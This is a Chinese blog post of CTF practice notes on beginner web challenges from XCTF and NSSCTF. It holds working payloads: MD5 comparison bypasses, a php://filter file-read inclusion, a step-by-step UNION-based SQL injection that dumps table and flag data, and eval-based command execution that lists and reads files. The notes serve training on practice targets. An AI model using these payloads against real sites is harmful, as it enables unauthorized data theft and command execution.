web刷题小记

碰到web题老是被卡,故开始刷题


攻防世界

攻防世界 (xctf.org.***)

1.ip>>X-Forwarded-For

2.referer表示来自

NSS

 [SWPUCTF 2021 新生赛]gift_F12

https://www.nssctf.***/problem/382

全局搜索flag别忘记看hint改flag的格式

[SWPUCTF 2021 新生赛]jicao

1.代码审计,注意json格式解码,post

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>
NSSCTF{75422e92-a2b6-4ad2-ab28-3febd84a3bf9}

[SWPUCTF 2021 新生赛]easy_md5 

md5绕过

a.弱等于(==)绕过

url:

http://node5.anna.nssctf.***:28158?name=240610708

post:

password=QLTHNDT

b.数组绕过:

参考:[SWPUCTF 2021 新生赛]easy_md5-CSDN博客

[SWPUCTF 2021 新生赛]include 

include_once($file);

include题目的标志

node4.anna.nssctf.***:28571/?file=php://filter/read=convert.base64-encode/resource=flag.php

伪协议读取

[SWPUCTF 2021 新生赛]easy_sql

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+
?wllm=-1' union select 1,2,3--+
?wllm=-1' union select 1,2,database()--+
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+ 

参考:

sql注入详解-CSDN博客

group_concat用法详解-CSDN博客

[SWPUCTF 2021 新生赛]easyrce

rec:eval

/?url=system("ls%20/");
/?url=system("cat%20/flllllaaaaaaggggggg");

转载请说明出处内容投诉
CSS教程_站长资源网 » web刷题小记

发表评论

欢迎 访客 发表评论

一个令你着迷的主题!

查看演示 官网购买